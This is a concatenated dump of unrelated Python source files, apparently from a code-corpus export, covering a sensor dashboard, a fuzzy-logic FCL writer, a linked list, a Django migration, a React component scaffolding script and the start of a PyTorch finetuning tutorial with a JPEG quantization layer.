Arguments:
dt_from_: date range from
dt_to_: date range to
Returns:
sensor_names: a list of sensor names
sensor_temp_ranges: json data with temperate ranges
"""
logging.info(
"Calling aranet_trh_analysis with parameters %s %s"
% (
dt_from.strftime(CONST_TIMESTAMP_FORMAT),
dt_to.strftime(CONST_TIMESTAMP_FORMAT),
)
)
query = db.session.query(
ReadingsAranetTRHClass.timestamp,
ReadingsAranetTRHClass.sensor_id,
SensorClass.name,
ReadingsAranetTRHClass.temperature,
ReadingsAranetTRHClass.humidity,
).filter(
and_(
ReadingsAranetTRHClass.sensor_id == SensorClass.id,
ReadingsAranetTRHClass.timestamp >= dt_from,
ReadingsAranetTRHClass.timestamp <= dt_to,
)
)
df = pd.read_sql(query.statement, query.session.bind)
logging.info("Total number of records found: %d" % (len(df.index)))
return temperature_range_analysis(df, dt_from, dt_to)
def temperature_range_analysis(temp_df, dt_from, dt_to):
"""
Performs temperature range analysis on a given pandas dataframe.
Arguments:
temp_df:
dt_from: date range from
dt_to: date range to
Returns:
sensor_names: a list of sensor names
sensor_temp_ranges: json data with temperate ranges
"""
df = copy.deepcopy(temp_df)
df_unique_sensors = df[["sensor_id", "name"]].drop_duplicates(["sensor_id", "name"])
sensor_ids = df_unique_sensors["sensor_id"].tolist()
sensor_names = df_unique_sensors["name"].tolist()
# extracting date from datetime
df["date"] = pd.to_datetime(df["timestamp"].dt.date)
# Reseting index
df.sort_values(by=["timestamp"], ascending=True).reset_index(inplace=True)
data_by_sensor_id = {}
for sensor_name, sensor_id in zip(sensor_names, sensor_ids):
df_sensor = df[df["sensor_id"] == sensor_id]
# grouping data by date-hour and sensor id
sensor_grp = df_sensor.groupby(
by=[
df_sensor.timestamp.map(
lambda x: "%04d-%02d-%02d-%02d" % (x.year, x.month, x.day, x.hour)
),
"date",
]
)
# estimating hourly temperature mean values
sensor_grp_temp = sensor_grp["temperature"].mean().reset_index()
try:
bins = TEMP_BINS[SENSOR_CATEORIES[sensor_id]]
except KeyError:
logging.error(
f"Don't know how to categorise or bin sensor {sensor_id} "
"in the dashboard."
)
continue
# binning temperature values
sensor_grp_temp["temp_bin"] = pd.cut(sensor_grp_temp["temperature"], bins)
# converting bins to str
sensor_grp_temp["temp_bin"] = sensor_grp_temp["temp_bin"].astype(str)
# get bin counts for each sensor-day combination
sensor_grp_date = sensor_grp_temp.groupby(by=["date", "temp_bin"])
sensor_cnt = sensor_grp_date["temperature"].count().reset_index()
sensor_cnt.rename(columns={"temperature": "temp_cnt"}, inplace=True)
# Adding missing date/temp_bin combos
bins_list, df_list = resample(sensor_cnt, bins, dt_from, dt_to)
data_by_sensor_id[sensor_id] = {
"name": sensor_name,
"bins": bins_list,
"data": [
{
"date": df["date"].dt.strftime("%Y-%m-%d").to_list(),
"count": df["temp_cnt"].to_list(),
}
for df in df_list
],
}
return len(data_by_sensor_id.keys()), json.dumps(data_by_sensor_id)
def fetch_sensor_data(dt_from, dt_to, sensor_type, sensor_ids):
sensor_type_name = get_sensor_type_name(sensor_type)
if not is_valid_sensor_type(sensor_type):
raise ValueError(f"Don't know how to fetch data for sensor type {sensor_type}")
data_table = get_table_by_sensor_type(sensor_type)
data_table_columns = [
getattr(data_table, column["column_name"])
for column in get_columns_by_sensor_type(sensor_type)
]
query = db.session.query(
data_table.timestamp,
data_table.sensor_id,
SensorClass.name,
*data_table_columns,
).filter(
and_(
data_table.sensor_id == SensorClass.id,
data_table.timestamp >= dt_from,
data_table.timestamp <= dt_to,
data_table.sensor_id.in_(sensor_ids),
)
)
df = pd.read_sql(query.statement, query.session.bind)
if sensor_type_name == "Aranet T&RH":
# Rounding to two decimal places, because our precision isn't infinite, and
# long floats look really ugly on the front end.
df.loc[:, "vpd"] = df.loc[:, "vpd"].round(2)
return df
@blueprint.route("/aranet_trh_dashboard")
@login_required
def aranet_trh_dashboard():
dt_from, dt_to = parse_date_range_argument(request.args.get("range"))
num_sensors, temperature_bins_json = aranet_trh_analysis(dt_from, dt_to)
return render_template(
"aranet_trh_dashboard.html",
num_sensors=num_sensors,
temperature_bins_json=temperature_bins_json,
dt_from=dt_from.strftime("%B %d, %Y"),
dt_to=dt_to.strftime("%B %d, %Y"),
)
@blueprint.route("/energy_dashboard")
@login_required
def energy_dashboard():
dt_from, dt_to = parse_date_range_argument(request.args.get("range"))
energy_data = {}
# lights-on analysis
lights_results_df = lights_energy_use(dt_from, dt_to)
# ventilation analysis
ventilation_results_df = ventilation_energy_use(dt_from, dt_to)
# jsonify
energy_data["data"] = (
"["
+ lights_results_df.to_json(orient="records")
+ ","
+ ventilation_results_df.to_json(orient="records")
+ "]"
)
return render_template(
"energy_dashboard.html",
energy_data=energy_data,
dt_from=dt_from.strftime("%B %d, %Y"),
dt_to=dt_to.strftime("%B %d, %Y"),
)
# # # TIMESERIES DASHBOARD # # #
def add_mean_over_sensors(sensor_type, sensor_ids, df, roll_window_minutes=10):
"""Take the dataframe for timeseries, and add data for a new "sensor" that's the
mean of all the ones in the data
"""
if len(df) == 0:
return df
df_mean = df.groupby("timestamp").mean()
df_mean.loc[:, "sensor_id"] = "mean"
df_mean.loc[:, "name"] = "mean"
# The sensor data comes with a 10 minute frequency. However, the sensors may be
# "phase shifted" with respect to each other, e.g. one may have data for 00 and 10,
# while another may have 05 and 15. A 10 minute rolling mean smooths out these
# differences.
roll_window = timedelta(minutes=roll_window_minutes)
for column in get_columns_by_sensor_type(sensor_type):
column_name = column["column_name"]
df_mean[column_name] = df_mean[column_name].rolling(roll_window).mean()
df_mean = df_mean.reset_index()
df = pd.concat((df_mean, df), axis=0)
return df
def fetch_all_sensor_types():
"""Get all sensor types from the CROP database, for which we know how to render the
timeseries dashboard.
Arguments:
None
Returns:
List of dictionaries with keys "id" (int) and "sensor_type" (str).
"""
query = db.session.query(
TypeClass.id,
TypeClass.sensor_type,
)
sensor_types = db.session.execute(query).fetchall()
sensor_types = query_result_to_array(sensor_types)
sensor_types = [st for st in sensor_types if is_valid_sensor_type(st["id"])]
return sensor_types
def fetch_all_sensors(sensor_type):
"""Get all sensors of a given sensor type from the CROP database.
Arguments:
sensor_type: The database ID (primary key) of the sensor type.
Returns:
List of dictionaries with keys "id" (int) and "name" (str), sorted by "id".
"""
query = db.session.query(
SensorClass.id,
SensorClass.aranet_code,
SensorClass.name,
).filter(SensorClass.type_id == sensor_type)
sensors = db.session.execute(query).fetchall()
sensors = query_result_to_array(sensors)
sensors = {s["id"]: s for s in sorted(sensors, key=lambda x: x["id"])}
return sensors
@blueprint.route("/timeseries_dashboard", methods=["GET", "POST"])
@login_required
def timeseries_dashboard():
# Read query string
dt_from = request.args.get("startDate")
dt_to = request.args.get("endDate")
sensor_ids = request.args.get("sensorIds")
if sensor_ids is not None:
# sensor_ids is passed as a comma-separated (or space or semicolon, although
# those aren't currently used) string of ints, split it into a list of ints.
sensor_ids = tuple(map(int, re.split(r"[ ;,]+", sensor_ids.rstrip(" ,;"))))
sensor_type = request.args.get("sensorType")
if sensor_type is None:
sensor_type = get_default_sensor_type()
else:
sensor_type = int(sensor_type)
# Get the data from the database that will be required in all scenarios for how the
# page might be rendered.
sensor_types = fetch_all_sensor_types()
all_sensors = fetch_all_sensors(sensor_type)
# If we don't have the information necessary to plot data for sensors, just render
# the selector version of the page.
if (
dt_from is None
or dt_to is None
or sensor_ids is None
or not is_valid_sensor_type(sensor_type)
):
today = datetime.today()
dt_from = today - timedelta(days=7)
dt_to = today
return render_template(
"timeseries_dashboard.html",
sensor_type=sensor_type,
sensor_types=sensor_types,
all_sensors=all_sensors,
sensor_ids=sensor_ids,
dt_from=dt_from,
dt_to=dt_to,
data=dict(),
summaries=dict(),
data_columns=[],
)
# Convert datetime strings to objects and make dt_to run to the end of the day in
# question.
dt_from = datetime.strptime(dt_from, "%Y%m%d")
dt_to = (
datetime.strptime(dt_to, "%Y%m%d")
+ timedelta(days=1)
+ timedelta(milliseconds=-1)
)
df = fetch_sensor_data(dt_from, dt_to, sensor_type, sensor_ids)
if request.method == "POST":
df = df.sort_values("timestamp")
return download_csv(df, "timeseries")
data_keys = list(sensor_ids)
if len(sensor_ids) > 1:
df = add_mean_over_sensors(sensor_type, sensor_ids, df)
# Insert at start, to make "mean" be the first one displayed on the page.
data_keys.insert(0, "mean")
data_columns = get_columns_by_sensor_type(sensor_type)
data_dict = dict()
summary_dict = dict()
for key in data_keys:
df_key = (
df[df["sensor_id"] == key]
.drop(columns=["sensor_id", "name"])
.sort_values("timestamp")
)
# You may wonder, why we first to_json, and then json.loads. That's just to have
# the data in a nice nested dictionary that a final json.dumps can deal with.
data_dict[key] = json.loads(df_key.to_json(orient="records", date_format="iso"))
# Round the summary stats to two decimals, for nice front end presentation.
summary_dict[key] = json.loads(df_key.describe().round(2).to_json())
return render_template(
"timeseries_dashboard.html",
sensor_type=sensor_type,
sensor_types=sensor_types,
all_sensors=all_sensors,
sensor_ids=sensor_ids,
dt_from=dt_from,
dt_to=dt_to,
data=data_dict,
summaries=summary_dict,
data_columns=data_columns,
)
|
15,613 | 2b6f0209ed75d010b59fab2fdfdc309e817502d3 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
ANFIS in torch: read/write an Anfis system as a FCL file.
I'm not fully sure how FCL deals with TSK antecedents, if at all.
The proper FCL specification is IEC document 61131-7,
but I'm working from Committee Draft CD 1.0 (Rel. 19 Jan 97).
http://www.fuzzytech.com/binaries/ieccd1.pdf
@author: James Power <james.power@mu.ie> June 4, 2019
'''
import sys
_COMMENT = '//'
_INDENT = ' '
_BLANKLINE = '\n'
_SEMIC = ';' # Make this empty if you don't want a semic at the end of lines
_CONJ_STR = ' AND ' # Join antecedent and consequent clauses
_VARTYPE = 'REAL' # Type of the input/output variables
_TSK_COEFF = 'Linear' # How I list TSK-style coefficients in the MFs
def _in_mf_def(mfdef):
'''
Define bespoke translations for the membership functions.
Return a string with the MF name and parameters.
Based on the jfuzzylogic names,
http://jfuzzylogic.sourceforge.net/html/manual.html#membership
'''
cname = mfdef.__class__.__name__
if cname == 'GaussMembFunc':
return 'gauss {} {}'.format(mfdef.mu, mfdef.sigma)
elif cname == 'BellMembFunc':
return'gbell {} {} {}'.format(mfdef.a, mfdef.b, mfdef.c)
elif cname == 'TriangularMembFunc':
return'trian {} {} {}'.format(mfdef.a, mfdef.b, mfdef.c)
elif cname == 'TrapezoidalMembFunc':
return'trape {} {} {} {}'.format(mfdef.a, mfdef.b, mfdef.c, mfdef.d)
else:
return mfdef.pretty()
def _out_mf_def(rule):
'''
This is how we represent an output (TSK) membership function.
'''
params = ' '.join(['{}'.format(coeff) for coeff in rule.tolist()])
return '{} {}'.format(_TSK_COEFF, params)
def _out_mf_name(outnum, rnum):
'''
Return a made-up name for an output variable's MF (for this rule)
'''
return 'LINE_{}_{}'.format(outnum, rnum)
def _show_antecedents(rules, invars):
'''
Depict the rule antecedents as "v1 is mf1 AND v2 is mf2 AND ..."
Return a list with one entry per rule.
'''
row_ants = []
for rule_idx in rules.mf_indices:
thisrule = []
for (varname, fv), i in zip(invars, rule_idx):
thisrule.append('{} is {}'
.format(varname, list(fv.mfdefs.keys())[i]))
row_ants.append(_CONJ_STR.join(thisrule))
return row_ants
def show(model, fh=sys.stdout):
'''
Write a text representation of a model to stdout or given filehandle.
'''
print('FUNCTION_BLOCK', _COMMENT, model.description, file=fh)
print(_BLANKLINE, file=fh)
# Input variables and MFs:
invars = model.input_variables()
print('VAR_INPUT', file=fh)
for varname, _ in invars:
print(_INDENT, '{} : {}'.format(varname, _VARTYPE), _SEMIC, file=fh)
print('END_VAR', _BLANKLINE, file=fh)
for varname, fv in invars:
print('FUZZIFY', varname, file=fh)
for mfname, mfdef in fv.members():
print(_INDENT, 'TERM {} := {}'.format(mfname, _in_mf_def(mfdef)),
_SEMIC, file=fh)
print('END_FUZZIFY', _BLANKLINE, file=fh)
print(_BLANKLINE, file=fh)
# Output variables and rule coefficients:
onames = model.output_variables()
print('VAR_OUTPUT', file=fh)
for varname in onames:
print(_INDENT, '{} : {}'.format(varname, _VARTYPE), _SEMIC, file=fh)
print('END_VAR', _BLANKLINE, file=fh)
for outnum, outvar in enumerate(onames):
print('DEFUZZIFY', outvar, file=fh)
for rnum in range(model.coeff.shape[0]):
mfname = _out_mf_name(outnum, rnum)
mfdef = _out_mf_def(model.coeff[rnum][outnum])
print(_INDENT, 'TERM LINE_{}_{} := {}'.format(
outnum, rnum, mfdef), _SEMIC, file=fh)
print('END_DEFUZZIFY', _BLANKLINE, file=fh)
print(_BLANKLINE, file=fh)
# Rules (all in one rule block)
rule_ants = _show_antecedents(model.layer['rules'], invars)
print('RULEBLOCK', file=fh)
for rnum, rule in enumerate(model.coeff):
print(_INDENT, 'RULE {}: IF {}'.format(rnum, rule_ants[rnum]), file=fh)
conseq = []
for outnum, outvar in enumerate(rule):
mfname = _out_mf_name(outnum, rnum)
conseq.append('{} is {}'.format(onames[outnum], mfname))
print(_INDENT*2, 'THEN {}'.format(_CONJ_STR.join(conseq)),
_SEMIC, file=fh)
print('END_RULEBLOCK', _BLANKLINE, file=fh)
print(_BLANKLINE, file=fh)
print('END_FUNCTION_BLOCK', file=fh)
def write(model, filename):
'''
Write a text representation of a model to the given file.
'''
with open(filename, 'w') as fh:
show(model, fh)
print('Written', filename)
|
15,614 | d4c0745eb77c4631347e51b988a93fb376fcedcf | import os
# Data Frame Columns
COUNT = "count"
CNT_DOWN = "cnt_down" # Count of -1s present
CNT_GROUP = "cnt_group" # Count of members in the same group
CNT_GENE = "cnt_gene" # Number of genes
CNT_REGULATED = "cnt_regulated" # Count of times up- down-regulated
CNT_TERM = "cnt_term" # Number of GO terms"
CNT_UP = "cnt_up" # Count of +1s present
CV = "cv" # coefficient of variation
END = "End" # Start position of gene
GENE_ID = "GENE_ID" # Unique string for gene
GENE_IDS = "GENE_IDs" # List of GENE_ID
GENE_NAME = "GENE_NAME"
GROUP = "group"
GO_LINK = "GO_Link"
GO_ONTOLOGY = "GO_Ontology"
GO_TERM = "GO_Term"
GROUP = "group"
HOURS = "hours"
INDEX = "index"
LENGTH = "Length" # Length of gene in base pairs
MEAN = "mean" # average value
PRODUCT = "PRODUCT" # Transcript product
SAMPLE = "sample" # Identity of a sample
TERM = "term" # GO term
STAGE_NAME = "name" # Name of the stage
STAGE_COLOR = "color" # Color for the stage
START = "Start" # Starting position of gene
STATE = "state"
STRAND = "Strand" # either "+" or "-"
STD = "std" # Standard deviation
TIMEPOINT = "timepoint" # time in the experiment
# Paths
PROJECT_DIR = os.path.abspath(__file__)
for _ in range(4):
PROJECT_DIR = os.path.dirname(PROJECT_DIR)
DATA_DIR = os.path.join(PROJECT_DIR, 'data')
CODE_DIR = PROJECT_DIR
for directory in ["xstate", "python"]:
CODE_DIR = os.path.join(CODE_DIR, directory)
TEST_DIR = os.path.join(CODE_DIR, "tests")
DATA_PROVIDER_PERSISTER_PATH = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"data_provider.pcl")
SAMPLES_DIR = os.path.join(DATA_DIR, "samples")
ENSEMBLE_PATH = os.path.join(DATA_DIR, "ensemble.pcl")
# Data Characeristics
NUM_TIMES = 26
REF_TIME = 0 # Reference time
|
15,615 | be0dadb6fd7765f957a78799b572dc973ac6b5b4 | import os
data_root = './data/camera1'# 绝对路径
data_collection_config = {'cam_id':0,
'img_wight':1280,'img_hight':720,
'scan_topic_name': 'scan', # 激光消息名字,一般为scan
'local_ros':True,
'ROS_HOSTNAME':"192.168.43.17",# if local_ros is False
'ROS_MASTER_UR':"http://192.168.43.56:11311/",# if local_ros is False
}
camera_config = {
'camera_model': 'pinhole',# fisheye, pinhole or omnidir(Mei) model
'tag_type': 'chess', # 'chess' or 'aruco'
'aruco_id': 0, # 如果使用单个'aruco',需要id(使用aruco.DICT_4X4_250)
'tag_size': 0.0104,#, #单位米 0.012
'checkerboard': (9,7), # if choice chess ,need
'inter_params_path': os.path.join(data_root,'inter_param.pkl'),# 内参路径
'exter_params_path': os.path.join(data_root,'exter_param.pkl'),# 外参路径
'inter_image_path': os.path.join(data_root,'inter_img'),# 内参图像路径
'exter_image_path':os.path.join(data_root,'exter_param.jpg'),# 外参图像路径
'K':None,'D':None,'Xi':None#或者手动输入内参,List
}
calibrate_config={
'select_laser':'auto'
'',# auto or manual
'one_by_one_show':True,# one by one frame to show laser data
'optimize_method': 'svd',# 目前只有svd
}
|
15,616 | cf6250601cd9caeb28243231cd357bd822c0479c | """变形链表的实现(为链表加入头结点和尾结点)"""
class LNode():
"""节点初始化函数"""
def __init__(self, item, prev = None,next_=None):
self.item = item
self.next = next_
self.prev = prev
class RList():
def __init__(self):
self._head = LNode(None,None,None)
self._rear = LNode(None,None,None)
self._head.next = self._rear
self._rear.prev = self._head
self.size = 0
"""操作函数实现"""
"""插入操作"""
# 头部插入
def preappend(self,elem):
node = LNode(elem)
node.next=self._head.next
self._head.next.prev = node
self._head.next = node
node.prev = self._head
self.size+=1
# 尾部插入
def append(self,elem):
node = LNode(elem)
node.prev = self._rear.prev
node.next = self._rear
self._rear.prev.next = node
self._rear.prev = node
self.size+=1
# 任意位置插入元素
def insert(self,i,elem):
if i<0 or i>self.size:
print("error")
else:
node = LNode(elem)
p = self._head
while i>0:
p = p.next
i-=1
node.next=p.next
p.next.prev = node
p.next = node
node.prev = p
self.size+=1
"""删除操作"""
# 尾部删除操作
def pop_last(self):
self._rear.prev.prev.next = self._rear
self._rear.prev = self._rear.prev.prev
self.size-=1
# 头部删除操作
def pop_head(self):
self._head.next.next.prev = self._head
self._head.next = self._head.next.next
self.size-=1
# 删除任意未位置元素
def pop(self,i):
if i<0 or i>self.size:
print("error!")
else:
p = self._head.next
# 确定删除节点的位置
while i>0:
p = p.next
i-=1
p.next.prev = p.prev
p.prev.next = p.next
self.size-=1
"""遍历操作"""
# 正序输出
def printall(self):
p = self._head.next
while p is not None and p!=self._rear:
print(p.item)
p = p.next
# 倒序输出
def printback(self):
p = self._rear.prev
while p is not None and p!=self._head:
print(p.item)
p = p.prev
# 元素的汇集
def for_each(self,proc):
pCurrent = self._head.next
while pCurrent is not None and pCurrent is not self._rear:
proc(pCurrent.item)
pCurrent = pCurrent.next
# 定义生成器函数
def elements(self):
pCurrent = self._head.next
while pCurrent is not None and pCurrent is not self._rear:
yield pCurrent.item
pCurrent = pCurrent.next
if __name__ =="__main__":
l = RList()
l.preappend(1)
l.preappend(2)
l.preappend(3)
l.preappend(4)
l.append(0)
l.insert(0,5)
l.pop(0)
l.printall()
print("#####")
l.printback()
print("-----")
print("长度:%d"%(l.size))
print("8888888888")
for x in l.elements():
print(x)
|
15,617 | e5617db2a373036bb448a5a71c793ddd482ae9a1 | print "[INFO] Reading aminer_edge_list.csv"
# all edges
edge_list = []
# self cited edges
edge_list_1 = []
# non self cited edges
edge_list_2 = []
import csv
with open('../output/aminer_edge_list.csv', 'rb') as file:
reader = csv.reader(file)
try:
for row in reader:
src = row[0]
dest = row[1]
type = row[2]
edge = (src, dest)
edge_list.append(edge)
if type == '1' : edge_list_1.append(edge)
else : edge_list_2.append(edge)
except :
pass
print "[INFO] Done reading"
print "[INFO] Generating graph"
import networkx as nx
import matplotlib.pyplot as plt
# make a new graph
G = nx.Graph()
all_edges = []
all_edges.extend(edge_list_1)
all_edges.extend(edge_list_2)
G.add_edges_from(all_edges)
# positions for all nodes
pos = nx.spring_layout(G)
# draw set of nodes
nx.draw_networkx_nodes(G, pos, node_size=15, node_color='b')
# draw set of edges from self cited list
nx.draw_networkx_edges(G,pos, edgelist=edge_list_1, width=1, edge_color='r')
# draw set of edges from non self cited list
nx.draw_networkx_edges(G,pos, edgelist=edge_list_2, width=1, edge_color='g')
plt.show() # display
print "[INFO] Done generating graph"
|
15,618 | e9fd9614cf343dcd2e578875602749d97a167a4d | # Generated by Django 2.0.2 on 2019-11-26 09:07
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Player',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_name', models.CharField(max_length=100)),
('age', models.IntegerField()),
('league', models.CharField(max_length=100)),
('position', models.CharField(max_length=100)),
('current_club', models.CharField(max_length=100)),
('minutes_played', models.IntegerField()),
('nationality', models.CharField(max_length=100)),
('appearances', models.IntegerField(max_length=100)),
('goals_overall', models.IntegerField(default=0)),
('goals_home', models.IntegerField(default=0)),
('goals_away', models.IntegerField(default=0)),
('assists_overall', models.IntegerField(default=0)),
('clean_sheets_overall', models.IntegerField(default=0)),
('yellow_cards_overall', models.IntegerField(default=0)),
('red_cards_overall', models.IntegerField(default=0)),
],
),
]
|
15,619 | 8873d2acd50b5adaf3d0768cdba8b74514b0dca2 | # create_component.py - Creates React component from sample files
# into specified folder
# Make python2/3 compatible
from __future__ import print_function
import os
import sys
import argparse
from argparse import RawTextHelpFormatter
# Make python2/3 compatible
if (sys.version_info[0] < 3):
input = raw_input # python2 input parses strings as python syntax
PROG_DESC = """
create_component.py - Creates a React Component with
given name into the specified folder.
- <name>.tsx
- <name>.test.tsx
- index.tsx
specify config settings in 'crc.config.json' within
yarn root director
"""
parser = argparse.ArgumentParser(description=PROG_DESC,formatter_class=RawTextHelpFormatter)
parser.add_argument("name",help="Name of React Component")
parser.add_argument("path",help="Directory path for component, omit filename")
args = parser.parse_args()
# Make required directory folder structure
component_folder = os.path.join(args.path,args.name);
if (os.path.isdir(component_folder)):
opt = input("Folder exists, confirm potential overwrite(y/n):")
if (opt != "y"):
print("Script aborted, folder already exists")
exit(1)
else:
os.makedirs(component_folder);
# Read template files
__dir__ = os.getcwd();
TEMPLATE_COMPONENT_PATH = "template.tsx" #TODO: Replace with read from crc.config.json
TEMPLATE_TEST_PATH = "template.test.tsx" #TODO: Replace with read from crc.config.json
TEMPLATE_INDEX_PATH = "template.index.tsx"#TODO: Replace with read from crc.config.json
# Replace inline variables with specified configs
#TODO Read variable mapping from crc.config.json
var_mapping = dict()
var_mapping["$NAME"] = args.name
def parseFileLines(fname):
file_data = ""
try:
with open(fname,'r') as fin:
for line in fin:
for k in var_mapping.keys():
line = line.replace(k,var_mapping[k])
file_data += line
except Exception as e:
return None
return file_data
def writeFileLines(fname,file_lines):
with open(fname,'w+') as fout:
for line in file_lines:
fout.write(line)
# Read component template
component = parseFileLines(os.path.join(__dir__,TEMPLATE_COMPONENT_PATH))
# Read test template
test = parseFileLines(os.path.join(__dir__,TEMPLATE_TEST_PATH))
# Read index template
index = parseFileLines(os.path.join(__dir__,TEMPLATE_INDEX_PATH))
# Write files
component_file_path = os.path.join(component_folder,args.name+".tsx")
test_file_path = os.path.join(component_folder,args.name+".test.tsx")
index_file_path = os.path.join(component_folder,"index.tsx");
if (not component or not index):
print("Error, no component or index template found.",file=sys.stderr)
exit(1)
writeFileLines(component_file_path,component)
writeFileLines(index_file_path,index)
if (test):
writeFileLines(test_file_path,test)
|
15,620 | c2f66d43908eeb1901e2f45116ece8982253a138 |
def df2input(df,categories=[],numerical=[],ordinal=[],response=None):
import os
import sys
import numpy as np
import pandas as pd
# INPUT:
# df : the input dataframe
# categories : categorical features of df
# numerical : numerical float or int features of df
# ordinal : ordinal features (unspecific scale: high, medium, low)
# response : response
# OUTPUT:
# df_features : df prepped for ML
# array_features : numpy array version of df_features
# series_response: pandas series of the response
feature_columns = categories + numerical + ordinal
feature_columns.append(response)
df_features = df[feature_columns]
print(" original features shape:",df_features.shape)
df_features = df[feature_columns].dropna()
print("eliminated empty records features shape:",df_features.shape)
series_response = df_features[response]
df_features.drop([response],axis=1, inplace =True)
ohe_columns = categories + ordinal
df_features = pd.get_dummies(df_features, columns=ohe_columns)
print(" OHE features shape:",df_features.shape)
array_features = df_features.to_numpy()
return df_features, array_features, series_response
|
15,621 | 766d1ec9e6488016c89087b05544a02369d4200f | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
"""
from day1 import *
import pytest
class TestSanta:
"""
"""
def setup_method(self, method):
"""
"""
self.santa = Santa()
def test_constructor(self):
"""
"""
assert self.santa.floor == 0
@pytest.mark.parametrize("instructions,floor", [
("(())", 0),
("()()", 0),
("(((", 3),
("(()(()(", 3),
("))(((((", 3),
("())", -1),
("))(", -1),
(")))", -3),
(")())())", -3),
])
def test_move(self, instructions, floor):
"""
"""
for step in instructions:
self.santa.move(step)
assert self.santa.floor == floor
|
15,622 | 6901c7e57c319c25b6123bfb5121d7c83957b8d4 |
from django.urls import path, include
from . import views
urlpatterns = [
path('review/', views.review, name='review'),
path('write_review/',views.writereview, name = 'writereview'),
] |
15,623 | a6f02ce64008701b4c9c35610a18d6944f60fae7 | """
Finetuning Torchvision Models
=============================
**Author:** `Nathan Inkawhich <https://github.com/inkawhich>`__
"""
######################################################################
# In this tutorial we will take a deeper look at how to finetune and
# feature extract the `torchvision
# models <https://pytorch.org/docs/stable/torchvision/models.html>`__, all
# of which have been pretrained on the 1000-class Imagenet dataset. This
# tutorial will give an indepth look at how to work with several modern
# CNN architectures, and will build an intuition for finetuning any
# PyTorch model. Since each model architecture is different, there is no
# boilerplate finetuning code that will work in all scenarios. Rather, the
# researcher must look at the existing architecture and make custom
# adjustments for each model.
#
# In this document we will perform two types of transfer learning:
# finetuning and feature extraction. In **finetuning**, we start with a
# pretrained model and update *all* of the model’s parameters for our new
# task, in essence retraining the whole model. In **feature extraction**,
# we start with a pretrained model and only update the final layer weights
# from which we derive predictions. It is called feature extraction
# because we use the pretrained CNN as a fixed feature-extractor, and only
# change the output layer. For more technical information about transfer
# learning see `here <https://cs231n.github.io/transfer-learning/>`__ and
# `here <https://ruder.io/transfer-learning/>`__.
#
# In general both transfer learning methods follow the same few steps:
#
# - Initialize the pretrained model
# - Reshape the final layer(s) to have the same number of outputs as the
# number of classes in the new dataset
# - Define for the optimization algorithm which parameters we want to
# update during training
# - Run the training step
#
from __future__ import print_function
from __future__ import division
import sys
import PIL
import torch
import torch.nn as nn
import torch.optim as optim
import torch.distributed as dist
import numpy as np
import torchvision
from torchvision import datasets, models, transforms
import matplotlib.pyplot as plt
import time
import os
import copy
import argparse
from jpeg_layer import *
print("PyTorch Version: ",torch.__version__)
print("Torchvision Version: ",torchvision.__version__)
######################################################################
# Inputs
# ------
#
# Here are all of the parameters to change for the run. We will use the
# *hymenoptera_data* dataset which can be downloaded
# `here <https://download.pytorch.org/tutorial/hymenoptera_data.zip>`__.
# This dataset contains two classes, **bees** and **ants**, and is
# structured such that we can use the
# `ImageFolder <https://pytorch.org/docs/stable/torchvision/datasets.html#torchvision.datasets.ImageFolder>`__
# dataset, rather than writing our own custom dataset. Download the data
# and set the ``data_dir`` input to the root directory of the dataset. The
# ``model_name`` input is the name of the model you wish to use and must
# be selected from this list:
#
# ::
#
# [resnet, alexnet, vgg, squeezenet, densenet, inception]
#
# The other inputs are as follows: ``num_classes`` is the number of
# classes in the dataset, ``batch_size`` is the batch size used for
# training and may be adjusted according to the capability of your
# machine, ``num_epochs`` is the number of training epochs we want to run,
# and ``feature_extract`` is a boolean that defines if we are finetuning
# or feature extracting. If ``feature_extract = False``, the model is
# finetuned and all model parameters are updated. If
# ``feature_extract = True``, only the last layer parameters are updated,
# the others remain fixed.
#
parser = argparse.ArgumentParser(description = \
'Neural Network with JpegLayer')
# Top level data directory. Here we assume the format of the directory conforms
# to the ImageFolder structure
#data_dir = "./hymenoptera_data"
parser.add_argument('--data_dir', '-d', type=str,\
default='/data/jenna/data/', \
help='Directory of the input data. \
String. Default: /data/jenna/data/')
# Models to choose from [resnet, alexnet, vgg, squeezenet, densenet, inception]
#model_name = "squeezenet"
parser.add_argument('--model_name', '-m', type=str,\
default='squeezenet',\
help = 'NN models to choose from [resnet, alexnet, \
vgg, squeezenet, densenet, inception]. \
String. Default: squeezenet')
# Number of classes in the dataset
#num_classes = 3
parser.add_argument('--num_classes', '-c', type=int,\
default = 3,\
help = 'Number of classes in the dataset. \
Integer. Default: 3')
# Batch size for training (change depending on how much memory you have)
#batch_size = 8
parser.add_argument('--batch_size', '-b', type=int,\
default = 8,\
help = 'Batch size for training (can change depending\
on how much memory you have. \
Integer. Default: 8)')
# Number of epochs to train for
#num_epochs = 25
parser.add_argument('-ep', '--num_epochs', type=int,\
default = 25,\
help = 'Number of echos to train for. \
Integer. Default:25')
#Flag for whether to add jpeg layer to train quantization matrix
#add_jpeg_layer = True
parser.add_argument('--add_jpeg_layer', '-jpeg', \
action = 'store_false',\
help = 'Flag for adding jpeg layer to neural network. \
Bool. Default: True')
#Flag for initialization for quantization table. When true,qtable is uniformly random. When false, qtable is jpeg standard.
parser.add_argument('--rand_qtable', '-rq', \
action = 'store_false',\
help='Flag for initialization for quantization table. \
When true,qtable is uniformly random. When false, \
qtable is jpeg standard.\
Bool. Default: True.')
# Flag for printing trained quantization matrix
parser.add_argument('--qtable', '-q', \
action = 'store_true',\
help = 'Flag for print quantization matrix. \
Bool. Default: False.')
#Flag for visualizing the jpeg layer
parser.add_argument('--visualize', '-v',\
action = 'store_false',\
help = 'Flag for visualizing the jpeg layer. \
Bool. Default: True')
#Flag for regularize the magnitude of quantization table
#regularize = True
parser.add_argument('--regularize','-r',\
action = 'store_false',\
help = 'Flag for regularize the magnitude of \
quantizaiton table. Without the term, the quantization \
table goes to 0 \
Bool. Default: True')
#Jpeg quality. To calculate a scaling factor for qtable and result in different compression rate.
parser.add_argument('--quality', type = int,\
default = 50,\
help = 'Jpeg quality. It is used to calculate \
a quality factor for different compression rate. \
Integer. Default: 50')
parser.add_argument('--quant_only', action = 'store_true')
parser.add_argument('--cnn_only', action = 'store_true')
feature_extract = False
#parse the inputs
args,unparsed = parser.parse_known_args()
print(args)
######################################################################
# Helper Functions
# ----------------
#
# Before we write the code for adjusting the models, lets define a few
# helper functions.
#
